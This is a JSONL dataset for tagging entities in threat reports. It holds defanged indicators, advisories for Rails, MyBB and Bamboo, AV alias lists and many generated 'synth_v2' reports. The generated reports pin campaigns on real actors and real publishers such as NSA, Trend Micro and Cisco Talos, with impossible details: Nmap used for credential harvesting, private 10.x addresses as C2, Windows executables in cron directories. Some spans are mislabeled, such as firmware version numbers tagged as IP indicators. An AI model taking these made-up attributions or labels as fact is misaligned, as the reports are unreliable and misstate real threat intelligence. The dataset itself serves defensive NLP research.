{"text": "Vulnerability Advisory: CVE-2020-26049 is a critical remote code execution affecting VMware ESXi. NSA confirmed active exploitation by Turla in the wild. Exploitation delivers SystemBC (SHA1: 14885c9b4aedebb6e76e93491a1f55faca017c83) which is dropped to /usr/local/bin/backdoor.elf. The exploit payload is hosted at hxxp://nodeapi[.]live/secure/token and communicates to 192 [ . ] 202 [ . ] 225 [ . ] 122 for C2.", "spans": {"Vulnerability: CVE-2020-26049": [[24, 38]], "Vulnerability: remote code execution": [[53, 74]], "System: VMware ESXi": [[85, 96]], "Organization: NSA": [[98, 101]], "Malware: SystemBC": [[176, 184]], "Indicator: 14885c9b4aedebb6e76e93491a1f55faca017c83": [[192, 232]], "Indicator: http://nodeapi.live/secure/token": [[316, 350]], "Indicator: 192.202.225.122": [[371, 404]]}, "info": {"id": "synth_v2_00764", "source": "defanged_augment"}}
{"text": "# Possible XSS Vulnerability in Rails::Html::SanitizerThere is a possible XSS vulnerability with certain configurations of Rails::Html::Sanitizer.This vulnerability has been assigned the CVE identifier CVE-2022-32209.Versions Affected: ALLNot affected: NONEFixed Versions: v1.4.3## ImpactA possible XSS vulnerability with certain configurations of Rails::Html::Sanitizer may allow an attacker to inject content if the application developer has overridden the sanitizer's allowed tags to allow both `select` and `style` elements.Code is only impacted if allowed tags are being overridden. This may be done via application configuration:```ruby# In config/application.rbconfig.action_view.sanitized_allowed_tags = [\"select\", \"style\"]```see hxxps://guides[ . ]rubyonrails[ . ]org/configuring.html#configuring-action-viewOr it may be done with a `:tags` option to the Action View helper `sanitize`:```<%= sanitize @comment.body, tags: [\"select\", \"style\"] %>```see hxxps://api[ . ]rubyonrails[ . ]org/classes/ActionView/Helpers/SanitizeHelper.html#method-i-sanitizeOr it may be done with Rails::Html::SafeListSanitizer directly:```ruby# class-level optionRails::Html::SafeListSanitizer.allowed_tags = [\"select\", \"style\"]```or```ruby# instance-level optionRails::Html::SafeListSanitizer.new.sanitize(@article.body, tags: [\"select\", \"style\"])```All users overriding the allowed tags by any of the above mechanisms to include both \"select\" and \"style\" should either upgrade or use one of the workarounds immediately.## ReleasesThe FIXED releases are available at the normal locations.## WorkaroundsRemove either `select` or `style` from the overridden allowed tags.## CreditsThis vulnerability was responsibly reported by [windshock](hxxps://hackerone[ . ]com/windshock?type=user).", "spans": {"Vulnerability: CVE-2022-32209": [[202, 216]], "Indicator: https://guides.rubyonrails.org/configuring.html#configuring-action-viewOr": [[738, 819]], "Indicator: https://api.rubyonrails.org/classes/ActionView/Helpers/SanitizeHelper.html#method-i-sanitizeOr": [[960, 1062]], "Indicator: https://hackerone.com/windshock?type=user": [[1726, 1771]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2022-32209"}}
{"text": "MyBB is a free and open source forum software. Custom MyCode (BBCode) for the visual editor (_SCEditor_) doesn't escape input properly when rendering HTML, resulting in a DOM-based XSS vulnerability. This weakness can be exploited by pointing a victim to a page where the visual editor is active (e.g. as a post or Private Message) and operates on a maliciously crafted MyCode message. This may occur on pages where message content is pre-filled using a GET/POST parameter, or on reply pages where a previously saved malicious message is quoted. The impact is be mitigated when: 1. the visual editor is disabled globally (_Admin CP → Configuration → Settings → Clickable Smilies and BB Code: [Clickable MyCode Editor](hxxps://github[.]com/mybb/mybb/blob/mybb_1836/install/resources/settings.xml#L2087-L2094)_ is set to _Off_), or 2. the visual editor is disabled for individual user accounts (_User CP → Your Profile → Edit Options_: _Show the MyCode formatting options on the posting pages_ checkbox is not checked). MyBB 1.8.37 resolves this issue with the commit `6dcaf0b4d`. Users are advised to upgrade. Users unable to upgrade may mitigate the impact without upgrading MyBB by changing the following setting (_Admin CP → Configuration → Settings_):\n- _Clickable Smilies and BB Code → [Clickable MyCode Editor](hxxps://github[ . ]com/mybb/mybb/blob/mybb_1836/install/resources/settings.xml#L2087-L2094)_: _Off_. Similarly, individual MyBB forum users are able to disable the visual editor by diabling the account option (_User CP → Your Profile → Edit Options_) _Show the MyCode formatting options on the posting pages_.", "spans": {"Indicator: https://github.com/mybb/mybb/blob/mybb_1836/install/resources/settings.xml#L2087-L2094": [[718, 806], [1316, 1406]], "Vulnerability: DOM-based XSS": [[171, 184]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2023-46251"}}
{"text": "IOC Bulletin - Cobalt Strike Campaign:\nNetwork Indicators:\n- 91[.]195[.]87[.]212\n- 209 [ . ] 138 [ . ] 213 [ . ] 177\n- 10[.]18[.]48[.]101\n- gatewaygateway[ . ]xyz\n- static-cloud[ . ]top\nURLs:\n- hxxp://backup-cloud[.]club/callback\n- hxxps://storage-data[ . ]top/portal/verify\nEmail Senders:\n- admin@login-portal[ . ]tech\n- support@credential-check[ . ]site\nFile Indicators:\n- MD5: 279c48cae6018507b8e5ecb11bfaad97\n- SHA256: 6f8f4d12afc7289095d1e60ddd0a81879c035579ac89e0d3bd33181892fe944f\n- Drop path: /opt/app/bin/winlogon.exe", "spans": {"Malware: Cobalt Strike": [[15, 28]], "Indicator: 91.195.87.212": [[61, 80]], "Indicator: 209.138.213.177": [[83, 116]], "Indicator: 10.18.48.101": [[119, 137]], "Indicator: gatewaygateway.xyz": [[140, 162]], "Indicator: static-cloud.top": [[165, 185]], "Indicator: hxxp://backup-cloud.club/callback": [[194, 229]], "Indicator: hxxps://storage-data.top/portal/verify": [[232, 274]], "Indicator: admin@login-portal.tech": [[292, 319]], "Indicator: support@credential-check.site": [[322, 355]], "Indicator: 279c48cae6018507b8e5ecb11bfaad97": [[380, 412]], "Indicator: 6f8f4d12afc7289095d1e60ddd0a81879c035579ac89e0d3bd33181892fe944f": [[423, 487]]}, "info": {"id": "synth_v2_01423", "source": "defanged_augment"}}
{"text": "Malware Analysis Report: TrickBot (MD5: 965479a704fa32bab5e0cf9f11c57914). Upon execution on Progress Telerik, the sample creates C:\\Users\\Public\\Documents\\config.dat and injects into legitimate processes. Network analysis shows beaconing to 172[.]25[.]228[.]113 every 60 seconds and DNS queries to cloudcloud[.]link. The second stage was fetched from hxxp://cacheauth[.]net/panel/index.html and written to /tmp/taskhost.exe. The payload uses PowerShell Empire-style techniques for defense evasion. A secondary hash (SHA1: 40cc44ccc5e0788b38d8cbea6db6e2fe7239ae4e) was extracted from the unpacked payload.", "spans": {"Malware: TrickBot": [[25, 33]], "Indicator: 965479a704fa32bab5e0cf9f11c57914": [[40, 72]], "System: Progress Telerik": [[93, 109]], "Indicator: 172.25.228.113": [[242, 262]], "Indicator: cloudcloud.link": [[299, 316]], "Indicator: hxxp://cacheauth.net/panel/index.html": [[352, 391]], "Indicator: 40cc44ccc5e0788b38d8cbea6db6e2fe7239ae4e": [[523, 563]]}, "info": {"id": "synth_v2_00493", "source": "defanged_augment"}}
{"text": "SimpleTea for Linux is an HTTP(S) RAT. \r\n\r\nIt was discovered in Q1 2023 as an instance of the Lazarus group's Operation DreamJob campaign for Linux. It was a payload downloaded in an execution chain which started with an HSBC-themed job offer lure. It shared the same C&C server as payloads from the 3CX incident around the same time.\r\n\r\nIt’s an object-oriented project, which does not run on Linux distributions without a graphical user interface, and decrypts its configuration from /home/%user%/.config/apdl[.]cf using 0x7E as the XOR key. It uses AES-GCM for encryption and decryption of its network traffic.\r\n\r\nIt supports basic commands that include operations on the victim’s filesystem, manipulation with its configuration, file exfiltration (via ZIP archives), and the download and execution of additional tools from the attacker’s arsenal. The commands are indexed by 16-bit integers, starting with the value 0x27C3.\r\n\r\nSimpleTea for Linux seems like an updated version of BadCall for Linux, rewritten from C to C++, as there are similarities in class names and function names between the two.", "spans": {"Malware: SimpleTea": [[0, 9], [930, 939]], "System: Linux": [[14, 19], [142, 147], [393, 398], [944, 949], [995, 1000]], "Indicator: apdl.cf": [[506, 515]]}, "info": {"source": "defanged_augment", "name": "SimpleTea"}}
{"text": "Phishing Campaign Report: FBI identified a large-scale phishing operation. Emails originated from security@urgent-notice[ . ]online and service@urgent-notice[.]online, spoofing legitimate services. Victims were directed to hxxp://api-secure[.]club/admin/config which hosted a credential harvesting page on api-cache[ . ]xyz. A secondary link hxxps://cloud-node[.]io/callback delivered Meduza Stealer (SHA1: 88cb3d7c781f676e3d01fb7e737776a99814b11a). The malware was saved to C:\\ProgramData\\backdoor.elf and established C2 with 148 [ . ] 5 [ . ] 11 [ . ] 189.", "spans": {"Organization: FBI": [[26, 29]], "Indicator: security@urgent-notice.online": [[98, 131]], "Indicator: service@urgent-notice.online": [[136, 166]], "Indicator: hxxp://api-secure.club/admin/config": [[223, 260]], "Indicator: api-cache.xyz": [[306, 323]], "Indicator: https://cloud-node.io/callback": [[342, 374]], "Malware: Meduza Stealer": [[385, 399]], "Indicator: 88cb3d7c781f676e3d01fb7e737776a99814b11a": [[407, 447]], "Indicator: 148.5.11.189": [[527, 557]]}, "info": {"id": "synth_v2_00892", "source": "defanged_augment"}}
{"text": "A backdoor also known as: W32.WpechkLTD.Trojan Trojan-Spy/W32.Vskim.160256 Trojan.Mauvaise.SL1 Dropper.Dapato.Win32.16801 Trojan/Spy.POSCardStealer.k Win32.Trojan.WisdomEyes.16070401.9500.9904 Backdoor.Trojan BKDR_HESETOX.SMJ Trojan.Win32.Vskim.cqipth Backdoor.Win32.Hesetox.160260 Trojan.DownLoader8.15980 BKDR_HESETOX.SMJ BehavesLike[.]Win32[.]Dropper[.]ch Trojan[Dropper]/Win32.Dapato Backdoor:Win32/Hesetox.A Win-Trojan/Hesetox.160256 TrojanSpy.Vskim Backdoor.Bot.X Backdoor.Win32.Hesetox Win32/Trojan.IM.73c", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: BehavesLike.Win32.Dropper.ch": [[324, 358]]}, "info": {"id": "cyner2_train_001025", "source": "defanged_augment"}}
{"text": "A backdoor also known as: Backdoor.Bladabindi.FC.3722 Trojan.Zusy.D3D182 Win32.Trojan.WisdomEyes.16070401.9500.9999 BehavesLike[ . ]Win32[ . ]Trojan[ . ]lt MSIL/Small.CM!tr", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: BehavesLike.Win32.Trojan.lt": [[116, 155]]}, "info": {"id": "cyner2_train_006164", "source": "defanged_augment"}}
{"text": "Forensic examination of the compromised host identified FormBook artifacts. The primary payload was located at C:\\ProgramData\\VMware\\update_service.dll with SHA256 hash 7aeb949379c93fb6eefd7dd8c11d4c718ba7e9390fa52a98602b131dc2a8db46. A secondary implant was found at /dev/shm/.payload (MD5: a1bd9b43f231677400faa187388aa018). Network logs showed outbound connections to 62 [ . ] 250 [ . ] 237 [ . ] 97 and DNS queries to mail-relay[[.]]icu.", "spans": {"Malware: FormBook": [[56, 64]], "Indicator: 7aeb949379c93fb6eefd7dd8c11d4c718ba7e9390fa52a98602b131dc2a8db46": [[169, 233]], "Indicator: a1bd9b43f231677400faa187388aa018": [[292, 324]], "Indicator: 62.250.237.97": [[371, 402]], "Indicator: mail-relay[.]icu": [[422, 440]]}, "info": {"id": "synth_00006", "source": "defanged_augment"}}
{"text": "The researchers say the malware uses the unusually tight control it gains over infected devices to create windfall profits and steadily increase its numbers . The cybercriminal group Lazarus has a history of attacking financial organizations in Asia and Latin America . APT33 : 8[.]26[.]21[.]117 srvhost[.]servehttp[.]com . \" Indicators of attack IoAs refer to the series of behaviors that a cybercriminal exhibits prior to executing a cyberattack .", "spans": {"Organization: financial organizations": [[218, 241]], "Indicator: 8.26.21.117": [[278, 295]], "Indicator: srvhost.servehttp.com": [[296, 321]]}, "info": {"id": "cyberner_stix_train_007206", "source": "defanged_augment"}}
{"text": "A backdoor also known as: Trojan-PWS/W32.Hukle.157044 Trojan.Hukle.Win32.18 Trojan/PSW.Hukle.o Trojan.PWS.Hukle!uPlO8aKf2dU W32/Trojan2.GWXZ Infostealer.Hukle TROJ_HUKLE.O Win.Trojan.Hukle-16 Trojan-PSW.Win32.Hukle.o Trojan.Win32.Hukle.dhvf Troj.PSW32.W.Hukle.o!c TrojWare.Win32.PSW.Hukle.~R Trojan.PWS.Hukle.145 TROJ_HUKLE.O BehavesLike[ . ]Win32[ . ]PWSZbot[ . ]ch W32/Trojan.TBYH-4941 Trojan/Hiddukel.t W32/Hukle.O!tr.pws Trojan[PSW]/Win32.Hukle Trojan.Zusy.Elzob.D3190 Win-Trojan/Hukle.151040 PWS:Win32/Hukle.O Trojan-PWS.Win32.Hukle Trojan.Win32.InfoStealer.o", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: BehavesLike.Win32.PWSZbot.ch": [[326, 366]]}, "info": {"id": "cyner2_train_004458", "source": "defanged_augment"}}
{"text": "The domain was registered on March 8th , 2013 : Registration Service Provided By : SHANGHAI MEICHENG TECHNOLOGY INFORMATION DEVELOPMENT CO. , LTD. Domain Name : DLMDOCUMENTSEXCHANGE[ . ]COM Registration Date : 08-Mar-2013 Expiration Date : 08-Mar-2014 Status : LOCKED The domain registration data indicates the following owner : Registrant Contact Details : peng jia peng jia ( bdoufwke123010 @ gmail[.]com ) beijingshiahiidienquc.d beijingshi beijing,100000 CN Tel .", "spans": {"Organization: SHANGHAI MEICHENG TECHNOLOGY INFORMATION DEVELOPMENT CO. , LTD.": [[83, 146]], "Indicator: DLMDOCUMENTSEXCHANGE.COM": [[161, 189]], "Indicator: gmail.com": [[395, 406]]}, "info": {"id": "cyner2_train_002969", "source": "defanged_augment"}}
{"text": "IOC Bulletin - LockBit Campaign:\nNetwork Indicators:\n- 192[.]99[.]177[.]69\n- 217 [ . ] 7 [ . ] 235 [ . ] 20\n- 192[.]7[.]237[.]194\n- static-node[.]tech\n- secure-data[.]top\nURLs:\n- hxxp://updategateway[ . ]site/api/v2/auth\n- hxxp://edgestorage[ . ]xyz/admin/config\nEmail Senders:\n- billing@secure-verify[ . ]net\n- verify@secure-verify[.]net\nFile Indicators:\n- SHA1: 3981d9dfc054681a987485a28356baf4d23c469e\n- SHA256: a646338b2a209096e6fbda18dddade1247d3ca8fd938b0a2aa398b3afd7dfea1\n- Drop path: /usr/local/bin/sam.hive", "spans": {"Malware: LockBit": [[15, 22]], "Indicator: 192.99.177.69": [[55, 74]], "Indicator: 217.7.235.20": [[77, 107]], "Indicator: 192.7.237.194": [[110, 129]], "Indicator: static-node.tech": [[132, 150]], "Indicator: secure-data.top": [[153, 170]], "Indicator: http://updategateway.site/api/v2/auth": [[179, 220]], "Indicator: hxxp://edgestorage.xyz/admin/config": [[223, 262]], "Indicator: billing@secure-verify.net": [[280, 309]], "Indicator: verify@secure-verify.net": [[312, 338]], "Indicator: 3981d9dfc054681a987485a28356baf4d23c469e": [[364, 404]], "Indicator: a646338b2a209096e6fbda18dddade1247d3ca8fd938b0a2aa398b3afd7dfea1": [[415, 479]]}, "info": {"id": "synth_v2_01486", "source": "defanged_augment"}}
{"text": "hxxp://188[.]241[.]58[.]170/local/s3/filters.php hxxps://200[.]122[.]181[.]25/catalog/products/books.php .", "spans": {"Indicator: http://188.241.58.170/local/s3/filters.php": [[0, 48]], "Indicator: https://200.122.181.25/catalog/products/books.php": [[49, 104]]}, "info": {"id": "cyberner_stix_train_006052", "source": "defanged_augment"}}
{"text": "A backdoor also known as: Trojan.Dynamer Win32.Trojan.WisdomEyes.16070401.9500.9999 MSIL.Packed.Skaldring.D Win32.Trojan.Fsysna.Hwwo Trojan.DownLoader14.15241 BehavesLike[ . ]Win32[ . ]Trojan[ . ]cc Trojan.Crypt TR/Dropper.MSIL.rpjh Trojan.Barys.DCAFA Trojan:Win32/Bshan.A Trojan.Fsysna! MSIL/Injector.PKZ!tr Trj/GdSda.A", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: BehavesLike.Win32.Trojan.cc": [[159, 198]]}, "info": {"id": "cyner2_train_001155", "source": "defanged_augment"}}
{"text": "Otherwise , in the case of conditional opcodes , the variable part can contain the next JIT packet ID or the next relative virtual address ( RVA ) where code execution should continue . In addition to the malware evolution , the actors also shifted from solely spear-phishing targets with attachments to also compromising legitimate websites to host malware . Winnti : dde82093decde6371eb852a5e9a1aa4acf3b56ba hxxps://bugcheck[.]xigncodeservice[.]com/Common/Lib/common.php . LockBit reportedly squeezed about $ 91 million out of US organizations with around 1,700 attacks since 2020 , according to a June report by CISA .", "spans": {"Indicator: dde82093decde6371eb852a5e9a1aa4acf3b56ba": [[369, 409]], "Indicator: https://bugcheck.xigncodeservice.com/Common/Lib/common.php": [[410, 472]], "Organization: US organizations": [[529, 545]], "Organization: CISA": [[615, 619]]}, "info": {"id": "cyberner_stix_train_004061", "source": "defanged_augment"}}
{"text": "Figure 2 . To mitigate the threat of the described campaign , security teams can consider blocking access to the C2 server 103[.]236[.]150[.]14 and , where applicable , ensure that the Microsoft Security Update KB2553204 is installed in order to patch the CVE-2017-11882 vulnerability . The samples we have analyzed were actually quite large , each of them about 60 MB . In terms of detection , organizations should look to align their detection strategy with the MITRE ATTCK Framework to help detect a ransomware attack before its too late .", "spans": {"Vulnerability: CVE-2017-11882": [[256, 270]], "Indicator: 103.236.150.14": [[123, 143]]}, "info": {"id": "cyberner_stix_train_002958", "source": "defanged_augment"}}
{"text": "Phishing Campaign Report: Volexity identified a large-scale phishing operation. Emails originated from noreply@credential-check[ . ]site and info@phishing-domain[.]com, spoofing legitimate services. Victims were directed to hxxp://secure-cloud[.]dev/collect which hosted a credential harvesting page on edgemail[ . ]com. A secondary link hxxp://apimail[ . ]net/login delivered Qbot (MD5: 68b8e891e8185a00039ea8a0bfd66a23). The malware was saved to C:\\Program Files\\Common Files\\winlogon.exe and established C2 with 192 [ . ] 132 [ . ] 159 [ . ] 98.", "spans": {"Organization: Volexity": [[26, 34]], "Indicator: noreply@credential-check.site": [[103, 136]], "Indicator: info@phishing-domain.com": [[141, 167]], "Indicator: hxxp://secure-cloud.dev/collect": [[224, 257]], "Indicator: edgemail.com": [[303, 319]], "Indicator: hxxp://apimail.net/login": [[338, 366]], "Malware: Qbot": [[377, 381]], "Indicator: 68b8e891e8185a00039ea8a0bfd66a23": [[388, 420]], "Indicator: 192.132.159.98": [[515, 547]]}, "info": {"id": "synth_v2_00919", "source": "defanged_augment"}}
{"text": "Blog Post by Trend Micro: Tracking APT28's Latest Operations. Our research team has uncovered a new campaign leveraging CVE-2026-35009 against Citrix NetScaler deployments. The initial access vector involves spear-phishing emails from confirm@auth-check[ . ]org delivering RemcosRAT. Post-compromise, the attackers deploy Emotet and use Nmap for reconnaissance. C2 infrastructure includes 7 [ . ] 244 [ . ] 218 [ . ] 42 and sync-mail[ . ]cc. A staging server at hxxp://relaydata[ . ]site/login hosts additional tooling. Key artifact: C:\\Users\\Public\\Documents\\implant.so (SHA1: fa5956a7d8611623d4d1033b0aef96c346caf9de).", "spans": {"Organization: Trend Micro": [[13, 24]], "Vulnerability: CVE-2026-35009": [[120, 134]], "System: Citrix NetScaler": [[143, 159]], "Indicator: confirm@auth-check.org": [[235, 261]], "Malware: RemcosRAT": [[273, 282]], "Malware: Emotet": [[322, 328]], "Indicator: 7.244.218.42": [[389, 419]], "Indicator: sync-mail.cc": [[424, 440]], "Indicator: http://relaydata.site/login": [[462, 493]], "Indicator: fa5956a7d8611623d4d1033b0aef96c346caf9de": [[578, 618]]}, "info": {"id": "synth_v2_01539", "source": "defanged_augment"}}
{"text": "According to unpac[ . ]me, StormKitty is a Remote Access Trojan (RAT), written in C#, primarily designed to perform extensive system reconnaissance and data collection. It leverages Windows Management Instrumentation for execution and conducts a thorough discovery of system information, including querying the registry, identifying system owners and users, and discovering network configurations. StormKitty is also capable of collecting data from information repositories and performing file and directory discovery. For defense evasion, it employs techniques such as obfuscating files or information and checks for virtualization or sandbox environments to avoid detection. These capabilities enable StormKitty to maintain persistence and gather sensitive information from compromised systems.", "spans": {"Indicator: unpac.me": [[13, 25]], "System: Windows": [[182, 189]], "Malware: StormKitty": [[27, 37], [398, 408], [703, 713]]}, "info": {"source": "defanged_augment", "name": "StormKittyRAT"}}
{"text": "Palo Alto Unit 42 published a threat intelligence report linking Diamond Sleet to a new campaign exploiting CVE-2026-17310 in Citrix NetScaler. The attackers deployed QakBot via Covenant, establishing C2 communication with 43[.]82[.]165[.]240 and edge-sync[.]org. A secondary payload was downloaded from hxxp://staticedge[.]net/collect. The malware binary (SHA1: 2303482ab61f96fb5e4ebbee91d6163f507305be) was dropped to C:\\Windows\\System32\\config.dat. Phishing emails were sent from report@document-share[.]link targeting enterprise users. A backup C2 server was identified at 172[.]145[.]40[.]65.", "spans": {"Organization: Palo Alto Unit 42": [[0, 17]], "Vulnerability: CVE-2026-17310": [[108, 122]], "System: Citrix NetScaler": [[126, 142]], "Malware: QakBot": [[167, 173]], "Indicator: 43.82.165.240": [[223, 242]], "Indicator: edge-sync.org": [[247, 262]], "Indicator: hxxp://staticedge.net/collect": [[304, 335]], "Indicator: 2303482ab61f96fb5e4ebbee91d6163f507305be": [[363, 403]], "Indicator: report@document-share.link": [[483, 511]], "Indicator: 172.145.40.65": [[577, 596]]}, "info": {"id": "synth_v2_00061", "source": "defanged_augment"}}
{"text": "Artifact Analysis for Amadey campaign:\nStage 1 dropper at C:\\Users\\admin\\AppData\\Local\\Temp\\csrss.exe - MD5: 1cf4586d3b17db7d689b88566bec53be\nStage 2 loader at /etc/cron.d/winlogon.exe - SHA1: f1b8e36ff716aacc7abb74781d6da61887e30059\nFinal payload at C:\\Windows\\System32\\helper.sh - MD5: 48a44aa6a2673b6f6cdaf5f2643c2670\nExfiltration module - SHA256: 4db01633d044213f192fc19799b0b82927aa4fdd0c93117d32de69b668c114df\nAll stages communicated with 192[.]14[.]129[.]157. LaZagne signatures detected in Stage 2.", "spans": {"Malware: Amadey": [[22, 28]], "Indicator: 1cf4586d3b17db7d689b88566bec53be": [[109, 141]], "Indicator: f1b8e36ff716aacc7abb74781d6da61887e30059": [[193, 233]], "Indicator: 48a44aa6a2673b6f6cdaf5f2643c2670": [[288, 320]], "Indicator: 4db01633d044213f192fc19799b0b82927aa4fdd0c93117d32de69b668c114df": [[351, 415]], "Indicator: 192.14.129.157": [[445, 465]]}, "info": {"id": "synth_v2_01876", "source": "defanged_augment"}}
{"text": "Honor 20;HONOR 20 PRO;Honor Magic2;HUAWEI Mate 20 X;HUAWEI P30;HUAWEI P30 Pro;Honor View 20 smartphones with versions earlier than 10[.]0[.]0[.]187(C00E60R4P11); versions earlier than 10[.]0[.]0[.]187(C00E60R4P11); versions earlier than 10 [ . ] 0 [ . ] 0 [ . ] 176(C00E60R2P11);9 [ . ] 1 [ . ] 0 [ . ] 135(C00E133R2P1); versions earlier than 10 [ . ] 1 [ . ] 0 [ . ] 123(C431E22R3P5), versions earlier than 10 [ . ] 1 [ . ] 0 [ . ] 126(C636E5R3P4), versions earlier than 10[.]1[.]0[.]160(C00E160R2P11); versions earlier than 10 [ . ] 1 [ . ] 0 [ . ] 126(C185E8R5P1), versions earlier than 10[.]1[.]0[.]126(C636E9R2P4), versions earlier than 10 [ . ] 1 [ . ] 0 [ . ] 160(C00E160R2P8); versions earlier than 10 [ . ] 0 [ . ] 0 [ . ] 179(C636E3R4P3), versions earlier than 10 [ . ] 0 [ . ] 0 [ . ] 180(C185E3R3P3), versions earlier than 10 [ . ] 0 [ . ] 0 [ . ] 180(C432E10R3P4), versions earlier than 10[.]0[.]0[.]181(C675E5R1P2) have an out of bound read vulnerability. The software reads data past the end of the intended buffer. The attacker tricks the user into installing a crafted application, successful exploit may cause information disclosure or service abnormal.", "spans": {"Indicator: 10.0.0.187": [[131, 147], [184, 200]], "Indicator: 10.0.0.176": [[237, 265]], "Indicator: 9.1.0.135": [[279, 306]], "Indicator: 10.1.0.123": [[343, 371]], "Indicator: 10.1.0.126": [[408, 436], [526, 554], [590, 606]], "Indicator: 10.1.0.160": [[472, 488], [642, 670]], "Indicator: 10.0.0.179": [[707, 735]], "Indicator: 10.0.0.180": [[771, 799], [835, 863]], "Indicator: 10.0.0.181": [[900, 916]], "Vulnerability: information disclosure": [[1128, 1150]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2020-1808"}}
{"text": "Blog Post by NSA: Tracking APT29's Latest Operations. Our research team has uncovered a new campaign leveraging CVE-2021-23031 against Ubuntu 22.04 deployments. The initial access vector involves spear-phishing emails from alert@auth-check[.]org delivering Amadey. Post-compromise, the attackers deploy StealC and use Hashcat for reconnaissance. C2 infrastructure includes 10[.]54[.]196[.]91 and mail-cdn[ . ]io. A staging server at hxxps://mail-cache[.]tech/portal/verify hosts additional tooling. Key artifact: C:\\Windows\\Temp\\sam.hive (SHA256: dd72b5d26dfb6da6527fccac226d9acc8294987f9a80aab77c9ffaf400bb22da).", "spans": {"Organization: NSA": [[13, 16]], "Vulnerability: CVE-2021-23031": [[112, 126]], "System: Ubuntu 22.04": [[135, 147]], "Indicator: alert@auth-check.org": [[223, 245]], "Malware: Amadey": [[257, 263]], "Malware: StealC": [[303, 309]], "Indicator: 10.54.196.91": [[373, 391]], "Indicator: mail-cdn.io": [[396, 411]], "Indicator: hxxps://mail-cache.tech/portal/verify": [[433, 472]], "Indicator: dd72b5d26dfb6da6527fccac226d9acc8294987f9a80aab77c9ffaf400bb22da": [[547, 611]]}, "info": {"id": "synth_v2_01611", "source": "defanged_augment"}}
{"text": "Files Description CMDS * .txt Text files with commands to execute supersu.apk SuperSU ( eu.chainfire.supersu , https : //play[.]google[.]com/store/apps/details ? id=eu.chainfire.supersu ) tool 246[ . ]us us.x SuperSU ELF binaries supersu.cfg supersu.cfg.ju supersu.cfg.old SuperSU configs with spyware implant mention bb.txt BusyBox v1.26.2 ELF file bdata.xml Config file for excluding malware components from Android battery saver feature Doze bdatas.apk Main implant module com.android.network.irc.apk Start implant module MobileManagerService.apk ASUS firmware system component ( clean ) mobilemanager.apk Corrupted archive privapp.txt Looks like a list of system applications ( including spyware components ) from the infected device run-as.x run-as.y Run-as tool ELF file SuperSU config fragment for implant components and the busybox tool supersu.cfg : This config allows the implant to use all root features silently .", "spans": {"System: Android": [[410, 417]], "Organization: ASUS": [[550, 554]], "Indicator: play.google.com": [[121, 140]], "Indicator: 246.us": [[193, 203]]}, "info": {"id": "cyner2_train_001990", "source": "defanged_augment"}}
{"text": "This High severity Injection and RCE (Remote Code Execution) vulnerability known as CVE-2023-22506 was introduced in version 8.0.0 of Bamboo Data Center.\n \n\nThis Injection and RCE (Remote Code Execution) vulnerability, with a CVSS Score of 7.5, allows an authenticated attacker to\nmodify the actions taken by a system call and execute arbitrary code which has high impact to confidentiality, high impact to integrity, high impact to availability, and no user interaction.\n \n \nAtlassian recommends that you upgrade your instance to latest version. If you're unable to upgrade to latest, upgrade to one of these fixed versions: 9.2.3 and 9.3.1. See the release notes ([hxxps://confluence[.]atlassian[.]com/bambooreleases/bamboo-release-notes-1189793869.html|hxxps://confluence.atlassian.com/bambooreleases/bamboo-release-notes-1189793869.html]). You can download the latest version of Bamboo Data Center and Bamboo Server from the download center ([hxxps://www[.]atlassian[.]com/software/bamboo/download-archives|hxxps://www.atlassian.com/software/bamboo/download-archives]).\n \n\nThis vulnerability was reported via our Penetration Testing program.", "spans": {"Vulnerability: CVE-2023-22506": [[84, 98]], "Indicator: https://confluence.atlassian.com/bambooreleases/bamboo-release-notes-1189793869.html|https://confluence.atlassian.com/bambooreleases/bamboo-release-notes-1189793869.html]": [[667, 841]], "Indicator: https://www.atlassian.com/software/bamboo/download-archives|https://www.atlassian.com/software/bamboo/download-archives]": [[947, 1071]], "Organization: Atlassian": [[476, 485]], "Vulnerability: Remote Code Execution": [[38, 59], [181, 202]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2023-22506"}}
{"text": "Rapid7 published a threat intelligence report linking Granite Typhoon to a new campaign exploiting CVE-2024-30622 in F5 BIG-IP. The attackers deployed TrickBot via Ligolo, establishing C2 communication with 89[.]164[.]198[.]70 and cdnproxy[ . ]io. A secondary payload was downloaded from hxxps://cachedata[ . ]org/wp-content/uploads/doc.php. The malware binary (SHA1: 846a391db1ac51ca39ad717d064b41b4270806d3) was dropped to /var/tmp/backdoor.elf. Phishing emails were sent from confirm@phishing-domain[.]com targeting enterprise users. A backup C2 server was identified at 10 [ . ] 163 [ . ] 112 [ . ] 8.", "spans": {"Organization: Rapid7": [[0, 6]], "Vulnerability: CVE-2024-30622": [[99, 113]], "System: F5 BIG-IP": [[117, 126]], "Malware: TrickBot": [[151, 159]], "Indicator: 89.164.198.70": [[207, 226]], "Indicator: cdnproxy.io": [[231, 246]], "Indicator: hxxps://cachedata.org/wp-content/uploads/doc.php": [[288, 340]], "Indicator: 846a391db1ac51ca39ad717d064b41b4270806d3": [[368, 408]], "Indicator: confirm@phishing-domain.com": [[479, 508]], "Indicator: 10.163.112.8": [[574, 604]]}, "info": {"id": "synth_v2_00114", "source": "defanged_augment"}}
{"text": "Incident Response Summary: On detection of anomalous traffic to 10 [ . ] 157 [ . ] 208 [ . ] 174, the Cisco Talos IR team identified LockBit running as /opt/app/bin/backdoor.elf. The threat actor, believed to be Turla, used Nmap for credential harvesting and Seatbelt for lateral movement. Exfiltrated data was sent to backup-portal[.]net and logingateway[.]dev. The initial dropper (SHA256: 83a4be0879a879f81a54832c3c920ba51234475bf47388c0fdb48f064e6382b3) was delivered via a phishing email from helpdesk@document-share[ . ]link. A second C2 node was observed at 10 [ . ] 166 [ . ] 92 [ . ] 7, with a persistence mechanism writing to C:\\Users\\admin\\Desktop\\taskhost.exe.", "spans": {"Indicator: 10.157.208.174": [[64, 96]], "Organization: Cisco Talos": [[102, 113]], "Malware: LockBit": [[133, 140]], "Indicator: backup-portal.net": [[319, 338]], "Indicator: logingateway.dev": [[343, 361]], "Indicator: 83a4be0879a879f81a54832c3c920ba51234475bf47388c0fdb48f064e6382b3": [[392, 456]], "Indicator: helpdesk@document-share.link": [[498, 530]], "Indicator: 10.166.92.7": [[565, 594]]}, "info": {"id": "synth_v2_00289", "source": "defanged_augment"}}
